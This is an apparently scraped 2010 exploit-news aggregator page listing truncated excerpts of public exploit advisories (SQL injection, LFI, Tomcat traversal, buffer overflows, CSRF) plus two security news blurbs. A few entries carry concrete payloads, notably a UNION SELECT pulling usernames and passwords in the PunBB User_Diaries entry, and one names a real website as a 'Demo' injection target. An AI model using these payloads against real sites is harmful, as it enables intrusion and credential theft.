grab our rss feed

Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Home

Entries for July 30th, 2010

PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================================
PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability
=================================================================
#!/usr/bin/perl
# [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
# Author/s: Dante90, WaRWolFz Crew
# Created: [...]

Leave a Comment

EggBlogg 4.1 <= LFI Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EggBlogg 4.1 <= LFI Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================
EggBlogg 4.1 <= LFI Vulnerability
=================================
# Exploit Title: EggBlogg 4.1 <= LFI
# Date: 28 luglio 2010
# Author: Anti Sec
# Software Link: http://eggblog.net/
# Version: 4.1
# Google dork : Eggblogg
# Platform / Tested on: Slackware 13.1
# [...]

Leave a Comment

Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation
=======================================================================
Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability
VULNERABLE PRODUCTS
Zemana AntiLogger <=1.9.2.2.206
DETAILS:
AntiLog32.sys create a device called DeviceAntiLog32 , and handles DeviceIoControl request IoControlCode [...]

Leave a Comment

Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=============================================================
Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability
=============================================================
/*Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability get /etc/passwd Exploit
c0d3r: mywisdom
thanks for not being lame to change exploit author
tis is one of [...]

Leave a Comment

Joomla Component com_beamospetition SQL Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_beamospetition SQL Injection Vulnerability </title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
Joomla Component com_beamospetition SQL Injection Vulnerability
===============================================================
# Exploit Title : Joomla "com_beamospetition" Sql Injection Vulnerability
# Date : 29 – 7 – 2010
# Author : Forza-Dz
# Vendor : http://code.joomla.org/gf/project/beamospetition/frs/
# Version : All Versions
# [...]

Leave a Comment

HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================================
HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)
===============================================================
########################################################################################
# [...]

Leave a Comment

Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================================
Windows Script.Shell.1 0day suffer from ActiveX Remote Code Execution
=====================================================================
# Title : Windows Script.Shell.1 (V 1.0) (wshom.ocx) 0day suffer from
ActiveX Remote Code Execution?
# Tested : Windows xp (sp3)
##
## Author : [...]

Leave a Comment

BarCodeWiz BarCode ActiveX 3.29 PoC

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>BarCodeWiz BarCode ActiveX 3.29 PoC</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================
BarCodeWiz BarCode ActiveX 3.29 PoC
===================================
# BarCodeWiz Barcode ActiveX Control 3.29 PoC (SEH)
# Bug found: 24th July 2010
# Found by: loneferret
# Software: http://www.barcodewiz.com/
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on:
# Windows XP Professional [...]

Leave a Comment

PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================================
PunBB Mod User_Diaries <= 1.1.4 (diary_rss.php) Sql Injection Exploit
=====================================================================
#!/usr/bin/php
<?PHP
error_reporting(E_STRICT ^ E_WARNING);
/*
———————————————————————
PunBB Mod User_Diaries <= 1.1.4 "diary_rss.php" sql injection exploit
———————————————————————
download: http://www.punres.org/files.php?pid=467
by staker[at]hotmail[dot]it
———————————————————————
[*] http://[example]/diary_rss.php?id=0+UNION+SELECT+1,CONCAT_WS(0×3a,username,password),3,4,5,6,7,8,9+FROM+foo_users+WHERE+id=2#
[EXPLANATION / NOTE: IT WORKS REGARDLESS OF PHP.INI [...]

Leave a Comment

ExtCalendar 2 Blind SQL Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ExtCalendar 2 Blind SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
ExtCalendar 2 Blind SQL Injection Vulnerability
===============================================
==========================================================
# Date: 30/07/2010
# Author : Lagripe-Dz
# Category: webapps/0day
# Tested on: [ win xp sp2 ]
# Download: http://sourceforge.net/projects/extcal/
# Dork : inurl:"No Dorks 4 Kids"
==========================================================
?
[+] Vulnerable File :
http://www.site.com/[PATH]/calendar.php?mode=cat&cat_id=[ BLIND [...]

Leave a Comment

CBS Solutions Remote Sql Injection Exploit

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>CBS Solutions Remote Sql Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================
CBS Solutions Remote Sql Injection Exploit
==========================================
###########################
Title : CBS Solutions exploit
script:CBS Solutions
Date : 28/07/2010
Author : Storm – North Strom Team
My Home: http://HackTeach.org/cc
###########################
[ Exploit ]
http://localhost/[path]/newsitem.asp?id=SQl Injecti0n
####
Script Users Panel Path : http://localhost/path/login.asp
####
Demo:http://www.kingfisher-lighting.co.uk/newsitem.asp?id=SQL Injection
##############################################################
#==================================================
#{ST} Storm [...]

Leave a Comment

LightNEasy 3.2 admin account hijacking csrf vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>LightNEasy 3.2 admin account hijacking csrf vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
LightNEasy 3.2 admin account hijacking csrf vulnerability
=========================================================
# Author: pimpim
# Software Link: http://www.lightneasy.org/addons/downloads/send.php?dlid=125
# Version: [app version]
# Google dork : Powered by LightNEasy Content Manager
# Platform / Tested on: Ubuntu Linux
# Category: webapps/0day
# [...]

Leave a Comment

Joomla Component com_rsform Sql Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Component com_rsform Sql Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
Joomla Component com_rsform Sql Injection Vulnerability
=======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

Leave a Comment

MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================
MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
========================================================
#!/usr/bin/perl -w
#
# MAYASAN PORTAL V 1.0 / V 2.0 Database Disclosure Exploit
#
# Found & Coded: ZoRLu
#
# Tested on my [...]

Leave a Comment

ChordPulse 1.4 Denial of Service Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>ChordPulse 1.4 Denial of Service Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
ChordPulse 1.4 Denial of Service Vulnerability
==============================================
# Vendor: http://www.chordpulse.com/
########################################################################################
# [...]

Leave a Comment

BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
=================================================
# BarCodeWiz Barcode ActiveX Control 3.29 BoF (SEH)
# Bug found: 24th July 2010
# Author: loneferret
# Software: http://www.barcodewiz.com/
# Vulnerable file BarCodeWiz.dll
# LoadProperties method
# Tested on: Windows [...]

Leave a Comment

Concept E-commerce SQL Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Concept E-commerce SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Concept E-commerce SQL Injection Vulnerability
==============================================
# Vendor : http://www.conceptinternetltd.com/ecommerce.php
http://www.conceptinternetltd.com/brochure.php
# Software : ubuntu 10.04
# Date : 31/07/2010
# by : gendenk
# Site [...]

Leave a Comment

Mayasan Portal v2.0 (detay.asp) SQL Injection Vulnerability

Jul.30, 2010 in Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Mayasan Portal v2.0 (detay.asp) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===========================================================
Mayasan Portal v2.0 (detay.asp) SQL Injection Vulnerability
===========================================================
Author : CoBRa_21
Dork : intitle:"lamer kral v0calist"
Download Page : http://scripti.org/indir.php?id=632
########################################################################################
Sql Injection:
http://localhost/[path]/detay.asp?id=29 (Sql)
########################################################################################
lamer kral v0calist buda sana kapak olsun
anladin sen onu …..
########################################################################################
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [...]

Leave a Comment

Facebookâ??s Security Slackness: A Cautionary Tale

Jul.30, 2010 in News

With 500 million users offering up reams of personal data and ever-shifting and confusing privacy policies, Facebook is a tempting target for phishing and other nefarious activities. And itâ??s no wonder given the companyâ??s attitude to security. When hackers find vulnerabilities in the service, donâ??t expect any help from Facebook, which has adopted a â??blame [...]

Leave a Comment

Barnaby Jack Demonstrates ATM â??Jackpottingâ??

Jul.30, 2010 in News

In a city filled with slot machines spilling jackpots, it was a â??jackpottedâ? ATM machine that got the most attention Wednesday at the Black Hat security conference, when researcher Barnaby Jack demonstrated two suave hacks against automated teller machines that allowed him to program them to spew out dozens of crisp bills.
The demonstration was greeted [...]

Leave a Comment

Quote

We use Linux for all our mission-critical applications. Having the source code means that we are not held hostage by anyone's support department.

Categories
- Exploits
- News